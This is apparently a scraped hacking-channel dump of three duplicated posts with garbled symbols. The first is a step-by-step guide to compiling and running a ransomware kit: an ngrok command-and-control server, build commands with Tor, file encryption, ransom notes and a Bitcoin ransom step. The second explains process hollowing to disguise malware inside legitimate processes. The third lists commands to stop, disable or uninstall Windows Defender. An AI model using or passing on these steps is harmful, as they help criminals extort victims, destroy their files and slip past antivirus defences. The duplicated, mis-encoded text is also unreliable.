π¦TUTORIAL HOW TO RUN RANSOWAMRE ON WINDOWS ?
1) First of all lets start our external domain:
ngrok http 8080
This command will give us a url like http://2af7161c.ngrok.io. Keep this command running otherwise the malware won't reach our server.
2) Let's compile the binaries (remember to replace the domain):
make -e SERVER_HOST=2af7161c.ngrok.io SERVER_PORT=80 USE_TOR=true
The SERVER_PORT needs to be 80 in this case, since ngrok redirects 2af7161c.ngrok.io:80 to your local server port 8080.
3) After build, a binary called ransomware.exe, and unlocker.exe along with a folder called server will be generated in the bin folder. The execution of ransomware.exe and unlocker.exe (even if you use a diferent GOOS variable during compilation) is locked to windows machines only.
4) Enter the server directory from another terminal and start it:
cd bin/server && ./server --port 8080
To make sure that all is working correctly, make a http request to http://2af7161c.ngrok.io:
curl http://2af7161c.ngrok.io
5) If you see a OK and some logs in the server output you are ready to go.
Now move the ransomware.exe and unlocker.exe to the VM along with some dummy files to test the malware. You can take a look at cmd/common.go to see some configuration options like file extensions to match, directories to scan, skipped folders, max size to match a file among others.
6) Then simply run the ransomware.exe and see the magic happens π.
The window that you see can be hidden using the HIDDEN option described in the compilation section.
7) After download, extract and start the Tor proxy, the malware waits until the tor bootstrapping is done and then proceed with the key exchange with the server. The client/server handshake takes place and the client payload, encrypted with an RSA-4096 public key must be correctly decrypted on the server. The victim identification and encryption keys are stored in a Golang embedded database called BoltDB (it also persists on disk). When completed we get into the find, match and encrypt phase, up to N-cores workers start to encrypt files matched by the patterns defined. This proccess is really quick and in seconds all of your files will be gone.
7) The encryption key exchanged with the server was used to encrypt all of your files. Each file has a random primitive called IV, generated individually and saved as the first 16 bytes of the encrypted content. The algorithm used is AES-256-CTR, a good AES cypher with streaming mode of operation such that the file size is left intact.
8) The only two sources of information available about what just happen are the READ_TO_DECRYPT.html and FILES_ENCRYPTED.html in the Desktop.
9) In theory, to decrypt your files you need to send an amount of BTC to the attacker's wallet, followed by a contact sending your ID(located on the file created on desktop). If the attacker can confirm your payment it will possibly(or maybe not) return your encryption key and the unlocker.exe and you can use then to recover your files. This exchange can be accomplished in several ways and WILL NOT be implemented in this project for obvious reasons.
10) Let's suppose you get your encryption key back. To recover the correct key point to the following url:
curl -k http://2af7161c.ngrok.io/api/keys/:id
11) Where :id is your identification stored in the file on desktop. After, run the unlocker.exe by double click and follow the instructions.
That's it, got your files back :)
The server has only two endpoints:
POST api/keys/add - Used by the malware to persist new keys. Some verifications are made, like the verification of the RSA autenticity. Returns 204 (empty content) in case of success or a json error.
GET api/keys/:id - Id is a 32 characters parameter, representing an Id already persisted. Returns a json containing the encryption key or a json error
@uNDERCODETesting
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦TUTORIAL HOW TO RUN RANSOWAMRE ON WINDOWS ?
1) First of all lets start our external domain:
ngrok http 8080
This command will give us a url like http://2af7161c.ngrok.io. Keep this command running otherwise the malware won't reach our server.
2) Let's compile the binaries (remember to replace the domain):
make -e SERVER_HOST=2af7161c.ngrok.io SERVER_PORT=80 USE_TOR=true
The SERVER_PORT needs to be 80 in this case, since ngrok redirects 2af7161c.ngrok.io:80 to your local server port 8080.
3) After build, a binary called ransomware.exe, and unlocker.exe along with a folder called server will be generated in the bin folder. The execution of ransomware.exe and unlocker.exe (even if you use a diferent GOOS variable during compilation) is locked to windows machines only.
4) Enter the server directory from another terminal and start it:
cd bin/server && ./server --port 8080
To make sure that all is working correctly, make a http request to http://2af7161c.ngrok.io:
curl http://2af7161c.ngrok.io
5) If you see a OK and some logs in the server output you are ready to go.
Now move the ransomware.exe and unlocker.exe to the VM along with some dummy files to test the malware. You can take a look at cmd/common.go to see some configuration options like file extensions to match, directories to scan, skipped folders, max size to match a file among others.
6) Then simply run the ransomware.exe and see the magic happens π.
The window that you see can be hidden using the HIDDEN option described in the compilation section.
7) After download, extract and start the Tor proxy, the malware waits until the tor bootstrapping is done and then proceed with the key exchange with the server. The client/server handshake takes place and the client payload, encrypted with an RSA-4096 public key must be correctly decrypted on the server. The victim identification and encryption keys are stored in a Golang embedded database called BoltDB (it also persists on disk). When completed we get into the find, match and encrypt phase, up to N-cores workers start to encrypt files matched by the patterns defined. This proccess is really quick and in seconds all of your files will be gone.
7) The encryption key exchanged with the server was used to encrypt all of your files. Each file has a random primitive called IV, generated individually and saved as the first 16 bytes of the encrypted content. The algorithm used is AES-256-CTR, a good AES cypher with streaming mode of operation such that the file size is left intact.
8) The only two sources of information available about what just happen are the READ_TO_DECRYPT.html and FILES_ENCRYPTED.html in the Desktop.
9) In theory, to decrypt your files you need to send an amount of BTC to the attacker's wallet, followed by a contact sending your ID(located on the file created on desktop). If the attacker can confirm your payment it will possibly(or maybe not) return your encryption key and the unlocker.exe and you can use then to recover your files. This exchange can be accomplished in several ways and WILL NOT be implemented in this project for obvious reasons.
10) Let's suppose you get your encryption key back. To recover the correct key point to the following url:
curl -k http://2af7161c.ngrok.io/api/keys/:id
11) Where :id is your identification stored in the file on desktop. After, run the unlocker.exe by double click and follow the instructions.
That's it, got your files back :)
The server has only two endpoints:
POST api/keys/add - Used by the malware to persist new keys. Some verifications are made, like the verification of the RSA autenticity. Returns 204 (empty content) in case of success or a json error.
GET api/keys/:id - Id is a 32 characters parameter, representing an Id already persisted. Returns a json containing the encryption key or a json error
@uNDERCODETesting
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Process hollowing: Hiding code in legitimate processes
> Process hollowing is a code injection technique that involves spawning a new instance of a legitimate process and then βhollowing it outβ, i.e., replacing the legitimate code with malware.
> Unlike most injection techniques that add a malicious feature to an otherwise normally running process, the result of hollowing is a process that looks legitimate on the outside but is primarily malicious on the inside.
t.me/UndercodeTesting
π¦ππΌπ'π πππΈβπ :
While there are few known techniques that achieve process hollowing, the most common variant typically follows four steps to achieve stealthy execution of malicious code:
1) The malware spawns a new instance of a legitimate process (e.g., explorer.exe, lsass.exe, etc.), and places it in a suspended state.
The malware then hollows out the memory section in the new (and still suspended) process that holds the base address of the legitimate code.
2) To do this, the malware uses the NtUnmapViewOfSection routine.
It allocates read-write-execute (RWX) memory in the suspended process to prepare for the replacement malicious code.
3) The malware then copies malicious code into the allocated memory. It changes the target address of the first thread to the malicious programβs entry point.
4) When the thread resumes, the malicious code starts running, now disguised as a legitimate process. The malware is then free to delete remnants of itself from disk to avoid detection.
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Process hollowing: Hiding code in legitimate processes
> Process hollowing is a code injection technique that involves spawning a new instance of a legitimate process and then βhollowing it outβ, i.e., replacing the legitimate code with malware.
> Unlike most injection techniques that add a malicious feature to an otherwise normally running process, the result of hollowing is a process that looks legitimate on the outside but is primarily malicious on the inside.
t.me/UndercodeTesting
π¦ππΌπ'π πππΈβπ :
While there are few known techniques that achieve process hollowing, the most common variant typically follows four steps to achieve stealthy execution of malicious code:
1) The malware spawns a new instance of a legitimate process (e.g., explorer.exe, lsass.exe, etc.), and places it in a suspended state.
The malware then hollows out the memory section in the new (and still suspended) process that holds the base address of the legitimate code.
2) To do this, the malware uses the NtUnmapViewOfSection routine.
It allocates read-write-execute (RWX) memory in the suspended process to prepare for the replacement malicious code.
3) The malware then copies malicious code into the allocated memory. It changes the target address of the first thread to the malicious programβs entry point.
4) When the thread resumes, the malicious code starts running, now disguised as a legitimate process. The malware is then free to delete remnants of itself from disk to avoid detection.
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ DISABLE WINDOWS DEFENDER USING CMD :
instagram.com/UndercodeTesting
> Using Command Prompt
1) Open command prompt with administrative privileges
2) Run the following command to disable Windows Defender:
sc stop WinDefend
3) To enable Windows defender again, run the following command:
sc start WinDefend
4) Please note that this is a temporary method to stop Windows Defender. The service will return to its original state when the system is restarted. To disable Windows Defender permanently using command prompt, run the following command:
> sc config WinDefend start= disabled
> sc stop WinDefend
5) To enable it again on startup, run the following commands:
sc config WinDefend start= auto
sc start WinDefend
6) If you want to check the current state of Windows Defender service, run the following command:
> sc query WinDefend
Check the STATE variable. It should be in RUNNING state if it is enabled.
π¦ Using PowerShell
One advantage of PowerShell is that you can deploy changes to Windows Defender on multiple computers over the network.
If you prefer PowerShell way, follow the steps below:
1) Run PowerShell with administrative privileges (Windows key + X + A)
To disable real-time monitoring of Windows Defender, run the following command:
2) Set-MpPreference -DisableRealtimeMonitoring $true
3) To enable real-time monitoring, run the following command:
4) Set-MpPreference -DisableRealtimeMonitoring $false
5) The above method will only turn off real-time monitoring of Windows Defender. If you want to completely remove Windows Defender from Windows 10, use the following PowerShell command:
> Uninstall-WindowsFeature -Name Windows-Defender
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ DISABLE WINDOWS DEFENDER USING CMD :
instagram.com/UndercodeTesting
> Using Command Prompt
1) Open command prompt with administrative privileges
2) Run the following command to disable Windows Defender:
sc stop WinDefend
3) To enable Windows defender again, run the following command:
sc start WinDefend
4) Please note that this is a temporary method to stop Windows Defender. The service will return to its original state when the system is restarted. To disable Windows Defender permanently using command prompt, run the following command:
> sc config WinDefend start= disabled
> sc stop WinDefend
5) To enable it again on startup, run the following commands:
sc config WinDefend start= auto
sc start WinDefend
6) If you want to check the current state of Windows Defender service, run the following command:
> sc query WinDefend
Check the STATE variable. It should be in RUNNING state if it is enabled.
π¦ Using PowerShell
One advantage of PowerShell is that you can deploy changes to Windows Defender on multiple computers over the network.
If you prefer PowerShell way, follow the steps below:
1) Run PowerShell with administrative privileges (Windows key + X + A)
To disable real-time monitoring of Windows Defender, run the following command:
2) Set-MpPreference -DisableRealtimeMonitoring $true
3) To enable real-time monitoring, run the following command:
4) Set-MpPreference -DisableRealtimeMonitoring $false
5) The above method will only turn off real-time monitoring of Windows Defender. If you want to completely remove Windows Defender from Windows 10, use the following PowerShell command:
> Uninstall-WindowsFeature -Name Windows-Defender
β β β ο½ππ»βΊπ«Δπ¬πβ β β β